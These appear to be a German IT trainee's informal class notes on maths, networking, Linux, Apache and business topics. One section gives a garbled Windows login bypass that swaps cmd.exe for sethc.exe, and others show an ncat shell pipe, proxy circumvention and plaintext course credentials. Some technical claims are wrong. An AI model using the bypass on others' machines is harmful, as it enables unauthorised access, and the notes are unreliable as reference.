Womöglich ist die Aufgabe in der Abschlussprüfung mit bei, die ich aufs Ting nach Norwegen mitgenommen habe.. Prozentrechnen (auch können).

Wenn Kismet nach dem Interface fragt .. (Hacking)

Eda: 15 Min. vor dem Schlafengehen noch gelerntes gut zu merken.

Noch mal Werte umrechnen (im Selbstversuch): vom Dezimalsystem zu Dezimalsystem Binärsystem zu Dezimalsystem Dezimal zu Binärbereich Vom Hexadezimalsystem zum Binärsystem vom Dezimalsystem zum Hexadezimalsystem Vom Binärsystem zum Hexadezimalsystem

„Umrechnung von MiB(Mebibyte) aus dem Binärbereich in den Mbit (Megabit) aus dem Dezimalbereich.“ MiB is the real binary tense. Number of megabits to convert these: It`s 1024 * 1024 * 8 / 1 mio. = ca. 8,388608 Megabit

Hilfe über Binomische Formeln. (a+b)² = a² + 2ab + b² benötigt?

Prozentrechnen: Prozentsatz: Prozentwert: Grundwert: W : G * 100 =p% p : 100 * G = W W : p * 100 = G

Prozentsatz-Rechnung: 24287 Bomben hat die Usa auf Syrien und den Irak abgeworfen : 30743 Bomben hatte die Loalition insgesamt auf beide Länder abgeworfen 0,79 * 100 = 79% ist der Anteil an US-Bomben an der Koalition.

Zinsen für Zeiträume: Z = 3600 * 11,25 % = 405 Euro (müsste ich ein Jahr lang zahlen) 405 : 12 * 9 = 303,35 Euro zeigt den Betrag an, den ich in neun Monaten zu zahlen habe.

T = dreiviertel Jahr. 405 : 4 * 3 = 303,75 auch möglich.

Zehnerpotenzen.

Zehnerpotenzen haben als Basis 10. Große Zahlen lassen sich als Produkt einer Dezimalzahl und einer Zehnerpotenz schreiben. Beispiel: 3000 = 3 * 10 hoch 3 23000 = 2,3 * 10 hoch 4 , vier Stellen hinter dem Komma. 10 = 10 hoch 1 100 = 10 hoch 2 1000 = 10 hoch 3 1000000 = 10 hoch 6

Negativer Exponent.

Sehr kleine Dezimalzahlen lassen sich als Produkt aus einer einstelligen Dezimalzahl und einer Zehnerpotenz mit negativem Exponenten schreiben.

Beispiel: 3,4 * 10 hoch -3 = 0,0034 8,7 * 10 hoch -8 = 0,000000087 (acht Stellen hinter Komma)

Dissonanz = Eigentlich „Gegenklang“ Harmonie = griechisch = recht gefügt

18.4.2016 Präsentation:

- Ein Socket besteht aus einer IP und einem Port. - Bluej → ganz gut zum Java-Kennenkernen. Die Dozentin Antiosten kann es gut erklären. - Soundcloud → Das neue Myspace! - Easy BCD → parallel installierte Betriebssysteme (keine VM) - MBR = (MasterBootRecord) - Livescore(Sportticker) - Bulk rename Utility: Stapelverarbeitung

19.4.2016: Subnetzmasken (noch für IPv4):

Die Netzmaske ist eine Bitmaske, die im Netzwerkprotokoll IPv4 bei IP-Adressen angibt, wieviele Bits am Anfang der IP-Adresse das Netzpräfix ausmachen. Subnetzpräfix. (Im Mathe-Ordner schauen)

Protokoll: “Ein Protokoll hält oder legt fest, zu welchem Zeitpunkt oder in welcher Reihenfolge welcher Vorgang durch wen oder durch was veranlasst wurde oder wird. ”

Subnetzmasken werden erst in großen Betrieben notwendig.

- Grafikauflösungs-Berechnung: 2640*1920*35 Bit und Komprimierungsfaktor 1:2,5 = 7,73 MiB.

- Java in der Präsentation: Vorteile: Java ist einfach, weil strukturiert; sicher (noch relativ); Plattform-unabhängig; Multithreading-fähig (es kann mehrere Aktionen parallel durch führen); - JDK ist Sammlung für Programme, um ein neues Programm zu erstellen (anders als bei einer IDE). - Geschwungene Klammern: „AltGr“ + „/„ = { „AltGR“ + „=“ = } - Spacesniffer - Podkicker Pro - Geeks 4 Geeks: Coden direkt im Browser (HTML).

Probeweises Durchgehen der Abschlussprüfung Winter 2011/12:

1a. Erstellen eines Planes der Netzwerkstruktur mit allen gennannten Komponenten für die Taliko AG.

Cc: Beim Aufbau einer Kommunikation wenden Client und Server bestimmte Methoden an. Server lauscht immer z.B. .. dargestellt durch eine Grafik

Grafik einfügen ..client connectet immer ..

Dann kommt das ganz große Ding mit Regelsätzen für Firewall und demilitarisierte Zone und Benennung von Ports und Interfaces und Protokollen .. mann mann mann.

Dann geht es um eine ASDL-Leitung, Splittung. Trennt Telefon – und Internetsignale auf. Modem Modulator: Übersetzer von analog zu digital (siehe 56k-modems aus der commodore-zeit).

Ein client verschickt eine E-Mail Größe 3 MiB. Bitte Zeit berechnen! 3 MiB * 1024 = 3072 KiB * 1024 = 3145728 Byte * 8 = 25165,824kBit : 574 kBit/s = 43,69 Sekunden!!

Jedem Parameter eine Maßeinheit zuordnen, z.B:

Rotational Speed = RPM/min Formfaktor = Zoll Audible Noise = sone (oder dezibel?).

Markus machte mit uns eine Prüfung durch:

Osi-Modell. RAID. IPv6, Protokollanalyser, Traces … IPv6 manuell konfigurieren .. Firewall, Trojaner, Ports, Protokolle usw … https, Handshake-Protokoll .. kam drin vor

19.4.2016 - Subnetzmasken

Jetzt könnte man 254 Rechner einfügen. Subnetzpräfix. Wobei?

20 .4. 2016 - Windows-Passwort hacken

-Start, dann zur Systemsteuerung (alle Systemsteuerungselemente). Dann auf „Verwaltung“ gehen, dann weiter auf Computerverwaltung. Letztlich von dort zur Datenträgerverwaltung (Partitionierung von Festplatten, Speicherkarten möglich).

-Proxy: Proxy für LAN verwenden (Gilt nicht für Einwähl- und VPN-Verbindungen. -Man braucht eine CD/DVD vom System, das man hacken will (Installations-CD). 1. Installation neu starten; dann die „Reparaturoptionen“ starten. Dann zu den „Systemwiederherstellungsoptionen“, weiter zu cmd.exe .. Ordner: C: Windows .. Laufwerksbuchstaben hauen nicht mehr hin. Was unter C: stand, kann unter E: erreicht werden. E:\Windows\System32 Im Ordner System32 suchen (unter beispielsweise E). Ansehen mit „dir“.

dir /p = seitenweises Ansehen; Datei sethe.exe copy_/y copy_e:\windows\system32\sethe.exe e:\, Drücke Enter sethe.exe ist jetzt im E:\ - Verzeichnis. E:\>_copy_/y e: windows\System32\cmd.exe_e:\windows .. \System32\sethe.exe Restart. „Links unten ist ein Zeichen“ hatte ich dann notiert. Eine Taste wurde beim Einschalten gespammt (also sehr schnell und oft gedrückt beim hoch- fahren), plötzlich ging eine windows-Shell (CMD) auf. -net user dozent user → Passwort-Änderung Man braucht die Windows-Installationsdatei! -Es gibt Windows Live-USB-Sticks! -Online-Banking & Sicherheitssoftware es/et: Es/et öffnet einen speziell geschützten Web-Browser! -ie macht man aus einem laufenden Betriebssystem ein Image-File?? (Antwort: Mit dem unter Debian funzenden master-live-cd.sh ..) Lösungen zur Prüfung, Routingtabellen: Sehr kompliziert alles, Standleitungen und so.. DNS angreifen usw .. Virenscanner.

21.4.2016: Wieder Subnetzmasken (Markus machte Wiederholung):

Subnetzmasken gehen immer in 8er-Schritten bis 256 und die Null zählt man mit! Wirklich?

- Bei einer 26er-Subnetzmaske gibt es 4 Netze! Wieso? - Bei einer Routingtabelle zur Prüfung, die Markus probeweise mit uns durch spielte, muss man auch wissen, dass ETH0 & ETH1 etc .. eigene IP-Nummern haben und alles über Standleitung geht, oder ?? -“KMS“ unter Windows. - Inkrementelle und differenzielle Datensicherung

Inkrementell Nachteil: Die Wiederherstellung ist rechenintensiver. Vorteil: Weniger Speicherplatzbedarf!

Differenziell Nachteil: Speicherfresser (größerer Speicherbedarf). Macht alle sieben Tage ein Vollbackup. Vorteil: Schneller als das Inkrementelle Backup!

Im Bewerbungsgespräch muss das wie aus der Pistole geschossen kommen!

- AOMEI Backupper erstellen Backup IMMER, wenn System frisch ist (wenn alle treiber drauf sind). Betriebssystem : Partition C. Systemklon??

- Eine physikalische Festplatte kann in zwei logische Partitionen unterteilt werden.

- Windows erstellt aus Mac-Adressen Schlüssel ? -Backup (Datensicherung) kann man automatisieren (.zB. Täglich, wöchentlich)

Bis zum 2. Mai …

OSI-Modell

Verpflanschung?

Kernel = Betriebssystemkern, wo die Hardware eingebunden ist.

Firmen suchen Leute, die sich mit „Active Directory“ (seit Win 7 Premim) auskennen.

Win Server 8 Server core.

Cluster??

Wenn MySQL an die Grenzen stößt, wird Oracle interessant!

Apache, engine-x.

Verschiedene Protokolle und Ports, die einfach mal so gennt wurden .. SMTP: 25 HTTP: 80 FTP: 20/21 usw..

Power smell

HyperV (Hypervisor-Softare). Ganz wichtige Geschichte, wird in der Cimdata gar nicht besprochen .. sollte mich schlau machen !! Ist dies das Einsteigen mit einem persistent live system nach Hackerangriff?

Subnetzmasken gut erklärt ..

- Registry System Wizard

- RAID 5 – Formel. Copy & paste: “RAID5 (3 bzw. 4 Festplatten mit Redundanz): Kapazität = (Anzahl Festplatten -1) * Festplattenkapazität

Beispiel 3 Festplatten je 146 GB: (3-1) * 146 GB = 292 GB

Beispiel 4 Festplatten je 500 GB: (4-1) * 500 GB = 1500 GB”

Wiederholung Berechnung von Auflösung (Achtung, es könnte ein Test im Anmarsch sein)!!

Wiederholung Inkrementell und differenziell .. (aber wichtig: angucken !!)

Zeiten Min/std/sek. berechnen ...

Subnetmasken ..

VoIP-Arbeitsblatt (das gesuchte)

26.4.2016 Dateisysteme: VFAT etc..

-Total Commander? "Total Commander" erlaubt eine komfortable Verwaltung von Dateien und bietet ein integriertes ZIP- Utility sowie einen FTP-Client.

-XT Gold Xtree Gold (mit ersten Userinterface auf DOS).

- Millennium Edition (Gute Auflistung von DOS-Versionen).

FAT 16: Ist auf 4GB-Partition limitiert, aber Stick-Lebensdauer ist länger. Bringt die wenigsten Komplikationen mit sich.

Xfat ..

NTFS: Userrrechte gehen verloren, wenn man es auf FAT kopiert.

Ein Betriebssystem mit FAT32 geht bis 8 tib, dateiengröße nur bis 4 gib möglich. Ein Nachteil eines standardkonformen FAT32-Dateisystems ist, dass nur Dateien erstellt werden können, die kleiner als 4 GiB sind.[2] Mit der rückwärtskompatiblen Erweiterung FAT32+ sind zwar auch Dateien bis zu 256 GiB[1] möglich, diese Erweiterung wird aber nur von wenigen Systemen unterstützt.

VFAT (Virtual File Allocation Table) ist eine Erweiterung des FAT-Formats, die auf FAT12, FAT16 und seit dessen Einführung im Jahr 1997 auch auf FAT32 angewendet werden kann. Gelegentlich wird im Sprachgebrauch auch fälschlich VFAT mit FAT32 gleichgesetzt.

X-fat = Zahl ins Unermessliche.

XFS

Dos Msdos.sys

28.4. 2016 Elektrotechnik:

Präziser ausgedrückt, durch einen Leiter fließt eine elektrische Ladung. Sie ist eine Form der Energie. Diese elektrische Energie wird über über Elektronen im Leiter vom plus- zum minuspol übertragen und kann in elektrischen- und magnetischen Feldern gespeichert werden.

Die Stromstärke wird, weil Ladungsmenge in der Sekunde gemessen wird, über die Formel I = Q : t gemessen. Stromstärke = Ladung : Zeit.

(Was ich unlogisch finde an diesem Unterricht, war, dass es dann hieß:) Es gibt keinen Ladungsverbrauch, weil Ladung geht nie verloren. Und, wenn dann mehr Elektronen pro Sekunde durch den Leiter flitzen, wo soll diese Ladung her kommen, wenn durch einen Leiter elektrische Ladung fließt ??

Hervorgebracht durch Ladungstrennung (Plattenkondensator).

Spannung ist die Arbeit, die ich brauche, um Elektronen von einem Platz zum anderen zu bewegen. Spannung(V) = Arbeit (joule) : Ladung (couloumb).

Mit Kilowatt irgendwie kann man auch dem System Energie entwenden.

Internetsicherheit und Datenschutz

Internet ist Kommunikation, es geht immer eine Nachricht vom Sender zum Empfänger.

Das Internet, der erste Web-Server, wurde im CERN in Genf entwickelt. In Genf gab man seinen Senf zum Aloha-Net dazu! HTML ist standarisiert worden. Stand-ares-sierung .. also HTML wurde dem ares-system unterworfen, in den „Stand“ (dem Glied) der Arisierung eingegliedert. (Vorher gab‘s geile Gateway-Sachen COMMODORE 64 und solche Sachen...)

1. Dem arisiertem HTML stehen viele Netze gegenüber, die nicht einheitlich sind und diverste Software (China-Surprise surprise)!

2. „Dann Internet mit Abstraktionschicht, IP einheitlichliches System in diesem Wust. Diese Einheit schuf die LAN-Schnittstelle.“ steht hier. Und: „Twisted Pair ist eine Art Intranet“.

Twisted Pair beschreibt eine Ausführung des reinen Kabels (paarweise verdrillte Adern). Crossover beschreibt eine Steckerbelegung diese Kabels. Von daher sind die Begriffe nicht vergleichbar.

Konfektionierung: Als Konfektionieren bezeichnet man in der Produktion und Technik jegliche Art von Aufteilung, Längeneinteilung oder Festlegung anwendungsspezifischer Endstücke und Abmessungen. Twisted pair iat mit rj45 konfektioniert? Wird das so richtig gesagt?

Cross Over Ethernetkabel werden verwendet, wenn mann zwei Computer miteinader verbinden möchte über die Ethernet Schnittstelle.

Die Software versteckt das Internet im Hintergrund für mich, als User!

Was verbindet der Router? Splittet analoge und digitale Netzwerke. Telefon.

Netzwerk von zu Hause zum Provider heißt: Switch → Router → ASDL, ISDN usw .. . Er ist ein Datenverkehrprotokollierer, wenn Daten auf mehrere Ports geschickt werden (also eine Art Firewall?)

Der Proxy allerdings ist ein „Hierachieteil“, der eine Aufgabe übernimmt und ist KEIN Switch!

Der Drucker ist ein Server, weil er viele Sprachen beherrscht. Aber, wer Server und wer Client ist, das ist Prozess-Abhängig! Weil, wenn der Webserver die Datenbank abfragt, ist er der Datenbankclient!

Und das Internet ist wie die Post im realen Leben aufgebaut .. qwasi .. . Jeder Bereich im Internet hat seinen Zuständigkeitsbereich, weil der Client kann mit dem Schalterbeamten kommunizieren (welche Briefmarken drauf kommen, usw.. ); dann geht das Paket an die nächste „Schnittstelle“, zum Schalterbeamten. Der direkte Vergleich mit der TCP-IP-Schicht. Sie kontrolliert, ob auch die Adresse drauf ist.

Man kann sich einen Server wie ein riesiges Haus vorstellen, wo hinter jedem Büro (Port) ein Beamter sitzt, der eine andere Sprache (Protokoll) spricht. Er muss wissen, wo es hingehen soll. Standards sind daher wichtig.

Der Port- (nmap) ist einer, der jeden Beamten fragt, ob er rein gehen darf. Da hat er allerdings 65000 von möglichen Ports zu fragen, die so ein Computer hat. Die ersten 1023 Ports (Root-Systeme) allerdings sind von außen nicht erreichbar .. schon mal weniger Arbeit für unseren Portscanner!

Da gab es eine Gruppenarbeit: Jede Gruppe sollte eine Präsentation über eine Art von Schadsoftware halten und Angriffsarten.

Browser-hijacker; Bot-Netze; Exploid‘s; Malware (Ransomware, Viren, würmer, Keylogger), Trojaner(Spyware, Rogware, Rogue-AV), Scareware(Adware, Backdoor, Stealth), Crimeware ..

Trojaner werden von ihrer scheinbaren Nützlichkeit oft nicht von Antivirenscannern als bösartig erkannt. Einmal drin, kann er aber Schadsoftware nach landen, also sehr gefährlich!

Ransomware: Erpressersoftware hihihi, die droht Daten zu löschen.

Crimeware führt User auf gefakte Seiten! 2.5. 2016: Ubuntu:

Ubuntu (auch: Ubuntu Linux) ist eine kostenlose Linux-Distribution, die auf Debian basiert. Der Name Ubuntu bedeutet auf Zulu etwa „Menschlichkeit“. (Ich habe, so weit ich weiß, noch eine Liste irgendwo mit allen Befehlen, die es dazu gibt) Sollte auch mal in die Zusammenfassung eingetragen werden.

Das Smartphone ist erst mal ein Linux-Computer (Linux-Kernel..).

- Schlüssel für Netzwerk generieren.

- In andere Rechner gehen.

- ssh Autologin installieren. (Ingo noch mal fragen, was das genau war, also, wie man das noch mal installieren kann ..) mit Martin gelöst. Autologin evtl. auf btrfs-deb wiederholen..

Das soll sehr wirksam sein gegen eine Man-in-the-middle-Attacke!

Man muss dabei u. A. nano /etc/hosts editieren.

- Als lokaler Nutzer Datei konfigurieren.

Der sshd-demon muss auf dem Rechner laufen. Dies ist das Programm, das ssh-Verbindungen entgegen nimmt.

Secure Copy.

File anlegen und auf Ute koperen.

Mit dmesg weiß man, was im usb-stick los ist. dmesg -c. tail -f /var/log/*.log tail -f /var/log/apache2/*.log sucht nur „log“-Dateien.

Grep ssd /var/log -r herausgreifen grep username /var/log -r | wc -1 grep -r -n -i stichwort Datei /pfad .. grep -r(rekursiv subdirectory) -n(zeilen NR) -i(ignore case)

Leerstellensuche: Doppelte Hochkommas grep „may 2“ /var/log/auth.log | grep „session opened“ | wc -l grep „may 2“ /var/log/auth.log | grep „session opened“ | cut -d „ „ -f 12 | sort -u | wc -l oder | sort > /tmp/t oder | sort -u > /tmp/u

Dann wurde die Möglichkeit beleuchtet, sich mittels SSH über den Rechner UTE, am Proxy vorbei, in einen Server einzuloggen (Babylösung), oder gar drekt auf den Server in Karlsruhe einzuloggen (Erachsenenlösung).

Der 192.168.22.1 Antares-Server in der Cimdata bietet Ansätze, um sich auf den Server in Karlsruhe 188.68.50.27 einzuloggen, als auch auf den Proxy der Babylösung.

3.5.2016 Noch mehr verschlüsseln:

Mit Java kann man super gut verschlüsseln, allerdings sollte das Programm nicht die schlechteste Verschlüsselung nehmen.

Dann ging es um scp und user@host, remote: pfadfile

Der absolute Pfad fängt in der Root-Ebene an. /home/User/Schreibtisch/bla/datei.sh Beim relativen Pfad werden einzelne Komponenten eines Pfadnamens weggelassen, z.B: ../bla/datei.sh

Um Software zu installieren, muss man Archive erreichen & Softareaktualisierungen durchführen.

Um am Proxy in der cimdata vorbeizukommen, musste wir als Root immer den Socket des Proxys zum Export freigeben:

Ubuntu: /etc/apt/apt.conf.d/70_deb.conf export_http-proxy=“http://192.168.0.254:3128“ export_https-proxy=“https://192.168.0.254:3128“

Debian: /etc/apt/apt.conf Dann: export_http-proxy=“http://192.168.0.254:3128“ export_https-proxy=“https://192.168.0.254:3128“

Dannn hängt hier ein befehl herum: apt-get install opensshserver (könnte ich auch ohne ingo vertiefen). ifconfig eth0 = (Anzeigen lassen der IP) ctrl + D = Shell schließen, oder logout root. Putty: key importieren.

(irgendwie in dem Zusammenhang): „Anbinden eines dritten Rechners an das Netzwerk.“ Wirklich?

Remoterechner: Ute. Von dem soll ich mich auf dem fisirechner einloggen!

Mit diesem Befehl kann ich mich mit passwort-nennung, auf der fc einloggen. ssh -p 22220 [email protected]

Und nicht vergessen: ssh autologin funktioniert nur auf der user-oberfläche, mit root gar nicht, in der Cimdata!

Von bla(user) direkt auf fisicloud root route -n route add 188.68.50.27 gw 192.168.111.111 route -n ping 188.68.50.27 ssh -p 22220 phantasy2@fisicloud Was mich wundert, ist, dass wieso wir uns nicht am FW-Server anmelden mussten .. na, weil ute uns am Firewall-Server vorbei schlängelte.

Auf FC den Ordner .ssh erstellen. In diesen Ordner ein textfile ‚authorized keys‘, erstellen und den lokalen key id_rsa_pub dort rein kopieren.

Textdatei .ssh/config erweitern mit Eintrag: Host fc

Folgendes: Öffnen der Config-Datei mit erweiterten Einstellungen: root, nano .ssh/config Dort kann man dann den Namen, die ip, den port und den user anlegen. Dann speichern und schließen. ssh_fc = zu fisicloud.

Und dann den schlüssel in authorized_keys in fc packen, dann fragt fc nicht mehr nach meinem passwort.

Mit cat >> .ssh/config kann man was in eine bestehende Datei schreiben, wenn man ctrl + c am Schluss eingibt.

Wir mussten den Inhalt von unseren lokalen Rechnern .ssh/id_rsa.pub auf den Servern ute und fisicloud ablegen, unter .ssh/authorized_keys

Es gibt eine fisipedia.

Nano und joe sind sich ähnlich.

Mac: nmap fisicloud.de 22.80.443.995.993 (Zugang zu den Ports von fc)

Die fc: 22 = honeypot 25 = smta 80 und 443 = HTTP/WWW 993 = secure IMAP/POP 22220 = sshd

- Unter DiskUsage gibt‘s eine Software, die schaut, ob Ports abgeklappert werden. Eine Verbindung zum Angriffsrechner wäre nicht mehr möglich.

- Piwik ist ein Analysetool für Webzugriffe usw. (um vor Google nicht die Hosen runter zu lassen).

- phpmyadmin: kleine software, um datenbanken anzuzeigen.

Allgemeinzugriff auf der fisicloud: user: fisi; PW: cimi phomyadmin auf der fisicloud: User: max_db PW: seitMonaten um vom virtual-box-Ubuntu in‘s Internet zu kommen: 1. cat /etc/environment (Pfad wird angezeigt) history | grep_exp

Achtung! Im root-Verzeichnis gibt‘s auch das /etc- verzeichnis, obwohl es nicht angezeigt wird.

Das schweizer Taschenmesser des Netzwewrkadmins: ncat ipnr port z.B. ncat 192.168.50.210 1234

(Das hatte ich auch noch nicht so richtig kapiert .. muss auch noch abgecheckt werden) ..geht auch nur mit einer zweiten Person.. ncat_ui/p 1234 ncat -l 1234 | cmd | root 192.168.beispielip_1233

1. ncat -l 1233 2. ncat meineip _ 1233

4.5. 2016 Ein weiterer Tag mit Linux das *.tar.gz – file stammt noch aus der Geschichte der Bandlaufwerke.

Befehle ändern: alias_l home=“es al -al/home/username“ alias_m2up=“sudo apt-get update“ alias_p8 = „ping 8.8.8.8“ apt install nmapDas ist ein networkmapper, portscanner und es gibt ncat, oder nc, um Daten über TCP & UDP zu übertragen, im Netzwerk netstat -apne = Netzwerkverbindung ansehen (achtung, wird viel angezeigt) lsof -t = list open files; Blockgeräte (Laufwerke), Netzwerkports .. (bei mir kommt da eine ganz lange liste an Zahlen, ports wahrscheinlich).

Ncat -l 1234 (danach, wenn Port im Lauschmodus): ncat Ipsuv port (1234) netstat -apne | grep 1234 netcat.

Echo en GET / HTTP/1.0\n\n“ \ncat 192.168.50.152_80 „Wozu braucht man das“ hatte ich drunter geschrieben.

Von Linux auf Windows zugreifen

Benötigt: nmap für Windows!

- SSH-Server und Dienste .. für Windows?

- Selbstlernen: „Wie das Internet funktioniert“. Das geht bis in die Subnetze.

9.5. Betrieb und Umfeld mit Hr. Pöppl Ich war krank.. Komplexe Auftragssituationen, Informationswirtschaft, Wirtschaftliches Handeln, 10.5. Betrieb und Umfeld mit Hr. Pöppl Ich war krank.. Bedürfnisse, Nachfrage, Bedarf, Güter und Produktionsfaktoren,

11.5. Betrieb und Umfeld mit Hr. Pöppl Ich war krank.. Märkte und ökonomische Prinzipien,

12.5.2016 Wirtschaft – Unternehmensberatung für Existenzgründung Mit Herr Pöppl

Die soziale Marktwirtschaft geht von Ludwig Erhard aus. Im Gegensatz zur Sowjetunion gab‘s im Westen die Niederlassungsfreiheit.

- Der Köder muss dem Fisch schmecken und nicht dem Angler → Produkte sind immer Wünsche der Kunden!

- Für eine Unternehmensgründung eignen sich Projektteams gut. Der eine ist der Entwickler, der andere ist der Wirtschaftler. Ein-Mann-Unternehmen sind nicht gut.

- Es gibt täglich 30 neue Start-Ups in Berlin. Bank IBB vergibt Mikrokredite bis zu 25000 Euro.

Ein Unternehmen geht mit dem Businessplan zu erst zur Sparkasse. Wenn Sparkasse nicht übernimmt, springt die KfW ein. Diese sagt, sie übernimmt die Haftung. Sie haftet auch mit 80% bei Insolvenz des Unternehmens. Dann zahlt die Sparkasse das Geld an das Unternehmen aus.

Die KFW springt nur ein, wenn andere Banken nichts leisten können. Sonst gäbe es nur eine Staatsbank. KFW geht nur, wenn Sparkasse nicht will.

BPW = Businessplanwettbewerb; Tipp für Unternehmensgründung. 50 Seminate umsonst zum Thema Marketing. Finanzierung, Kontaktabende. Gewinn: 10000 Euro.

Sponsor: Wirtschaftsministerium, Siemens und andere Firmen.

Online anmelden.

Die Unfallversicherung zahlt der Arbeitgeber. Produktivität: Einsatz der Mittel und was dabei raus kommt. Dynamische wachsende Volkswirtschaften attraktiv.

BIP: Gesamtwert aller Güter und Dienstleistungen, diese Daten stammen vom deutschen statistischen Bundesamt.

Leipzig: Künstler kriegen kostenlos Ateliers.

Dann ist da eine Tabelle mit Beispiele aus der Informationswirtschaft, Preisgestaltung und Werbung und wie sich das mit ständigen/täglichen-, oder periodischen Bedarf, oder rhythmischen Bedarf .. usw. Verhält. Tabelle einfügen

Adam Smith: Kaufleute wollen sich immer einschränken.

Würth-Chef → sehr sozialer Mensch, Mittelstand. Open Andro Maps.

17.05.2016 Informationen und Methoden I mit Herr Leu ich war krank.. Es gab: Definition Projekt, Projektunterscheidungen, Projektzuständigkeiten, Projektträger, Aufgaben Projektmanagement, Überblick Projektphasen, Projektgestaltung, magisches Dreieck des Projektmanagements

Erfolgsfaktoren kennen, Fähigkeiten eines Projektleiters, Aufgaben eines Projektleiters, Projektstart: Projektauftrag klären, Ist-Analyse, klare Zieldefinition und exakte Bestimmung des Projektzieles z. B. eines Kundenauftrags, Aufgaben eines LASTENHEFTS, Rahmenbedingungen ausloten, Teamentwicklung, Qualitätsaspekte der Teamarbeit, Optimierungsregeln für Teamarbeit (Besprechungen, Konflikte auflösen, Informieren und kommunizieren).

18.05.2016 Informationen und Methoden I mit Herr Leu ich war krank.. Es gab: Rahmenbedingungen untersuchen, Erwartungen und Einfluss von Stakeholdern (Anspruchsgruppen) analysieren, Zielformulierung, Kommunikationsplan erarbeiten, Strukturplanung (Bündelung von Teilaufgaben zu Arbeitspaketen), Ablaufplanung (Vorgangsliste sachlogisch erstellen), Aufwands-/Einsatzermittlung, Kostenplanung, Meilensteine setzen,

Zeitpläne, Risikoanalyse, Planabweichungen erkennen, Steuerungsmaßnahmen, Einsatz von Balkendiagrammen und Netzplänen, Dokumentation und Statusberichte, Projektabnahme, Netzplanerstellungsübungen

Vergabe Gruppen-Projektarbeit: Auftragsbearbeitung, Angebotserstellung mit technischen und betriebswirtschaftlichen Inhalten, Schwerpunkt: Strukturierung über Geschäftsprozesse, Projektablauf, Netzplan

19.5. 2016 Dann wieder Linux

Vorstellung verschiedenster Distributionen: Red Hat, SuSe, Debian, from scratch, Slackware.

Pakete zählen: ls -l | wc -l

Was ist dpkg?? dpkg -l | wc -l; und mit | more seitenweise ansehen. Dpkg -l| wc -l > /tmp/pkg.liste = Schreibe in Datei die Nummer der Files.

.. und viele weiterer solcher Kniffe.

Tar -xzvf pruefungen.tgz = um gedownloadete *.tgz, oder *.tar.gz – Files zu entpacken.

Sources.list

In der apt.conf stehen Befehle zum Internetzugang drin (sollte man wissen)!!

Dann dokumentierte ich, wie ich ein jre 1.8.0_91 auf mein Lubuntu mit alten 3.3.3 – Kernel installiert hatte. Shane: 015154667521

31.5.2016 Angebot (im rechtlichen Sinn) mit Hr. Leu ist an eine bestimmte Person gerichtet.

Inhalt des Angebots: Allgemeine Formalitäten: Name, Adresse, Tel/Internet etc .. Leistungsbezeichnung, Zahlungsmodalitäten ..

Dann geht es hier los mit Lieferrabatt, Lieferskonto und verminderten Grundwert (was man sich ganz genau ansehen muss, sonst gibt‘s Fehler!)

Dann wurde das Projekt/Gruppenarbeit angestoßen, wo wir testweise, als Phantasyfirma, einen Auftrag zur Einrichtung eines Klassenraumes, durchzuführen hatten. Ich war in einer Gruppe mit Marcin, Hubert und Polat. Den hatten wir über eine gewisse Zeit durch zu führen, Abgabeschluss war am 1. Juli (glaub ich).

Ich hatte versucht, alle möglichen IP‘s an meinem Home-PC zu ermitteln.

2.6. 2016 LAMP mit Ingo

LinuxApacheMysqlPhp(oder Perl,Python)

Html basiert auf SGML. Mit HTML konnte man tausende Web-Pages frei geben, deshalb hatte sich die Einführung von IPv6 so in die Länge gezogen.

99% Erreichbarkeit ist nur mit viel spiegeln möglich. Content-deliver-Network hat Festplatten weltweit.

Ps fax | grep -i mysql

Dann hatten wir manuell den MySQL-Server installiert. netstat -apne | grep mysql service mysql status systemctl status mysql SQL = StructlyQueryLAnguage

ProzessID raus bekommen: ps -ef |grep ‚mysql‘ (um mysql stehen beiderseits hochkommatas).

In die datenbank kommt man mit mysql -u root -p

Dann zwei Seiten mit mysql-Befehlen.

SELECT * FROM table; Tip von Ingo: Urban Sketchers. Was bringt es, zu zeichnen, wenn man fotografieren kann?

6.6. 2016 Apache DHCP

Damals wusste ich nicht, was Vorbereitung und was Unterricht war. DHCP: DynamicHostConfigurationProtokoll.

Tcpdump -n port69 or port 68. …

Wenn man nur „route“ eingibt, gibt‘s die Routingtabelle. Destination, Gateway, Genmask .. Martin sagte, dort würde irgendwo die IP stehen, scheint aber nicht so..

Ich habe den Eindruck, an diesem Tag viel verpasst zu haben. z.B. während anderer Notizen die Hälfte verpasst und wozu Subnet ?? Und irgend etwas soll bei 190 ip-nummern vergebbar sein.

DNS: Gib mir IP-Nr. Von taz.de DHCP: Gibt IP-Nr & Pakete raus geben.

Wikipedia: „Das Dynamic Host Configuration Protocol (DHCP) ist ein Kommunikationsprotokoll in der Computertechnik. Es ermöglicht die Zuweisung der Netzwerkkonfiguration an Clients durch einen Server.“ Aber in dem Zusammenhang, was Ingo mir erzählte, war mir trotzdem nichts klar.

/usr/share/fonts/truetype#

Dort kann man fonts einfügen, und man muss einen befehl eingeben dann muss man fc-cache eingeben, um den font zu aktivieren (vermute ich)

Dann kam die Kreation von Vhosts ..

1. in /etc/hosts die ip vom Localhost und meinem Namen eintragen. z.B.: „127.0.0.1 bla“ Will man die Website online stellen, sollte man die ip angeben, die bei ifconfig an Stelle von wlan da ist. Ich weiß nicht, wie es bei port forwarding sein wird, also wie es denn wäre, wenn meine Website vom Internet aus zu sehen wäre, wenn ich meinen Localhost eintrage, anstatt, was im ifconfig angezeigt wird.. dann z.B.: „ping bla“

Dann unter /var/www mit „mkdir bla“ ein neues Verzeichnis erstellen. In dieses wird die Website (html) abgelegt. Dann: cd /etc/apache2/sites-available Dort wird mit cp 000-default.conf 001-bla.conf die conf-Datei kopiert. Mit nano 001-bla.conf wird in die Datei eingetragen: Server-Name: bla Document Root: /var/www/bla ctrl + o = speichern. Dann: a2ensite 001_bla.conf service apache2 restart ping bla, zum überprüfen.

Beim installieren von apache nicht apache-bin nehmen !

Dann sollte man, bei Bedarf, den virtual host beim proxy erlauben. System settings →network settings unter /var/www/bla kann man dann seine eigene Website ablegen und die ip, sowie den port beim Gerät vom Provider (router) durch reichen lassen, bei mir ar es eine Fritzbox. Außerdem kann man bei einem open - dyndns-dienst sich eine internetadresse aussuchen, dann muss man wiederum dem Router sagen, er soll dorthin zeigen.

Details werden folgen … .

7.6. (vermutlich) Wieder Linux Basics: dir, ls, la, ll, cd, pwd, history .. in der .bashrc kann man unter Anderem die Länge der History bestimmen.

(ich sollte dieses PDF mit dem „linux verständnis fuer alle“ mal auf meine website packen)

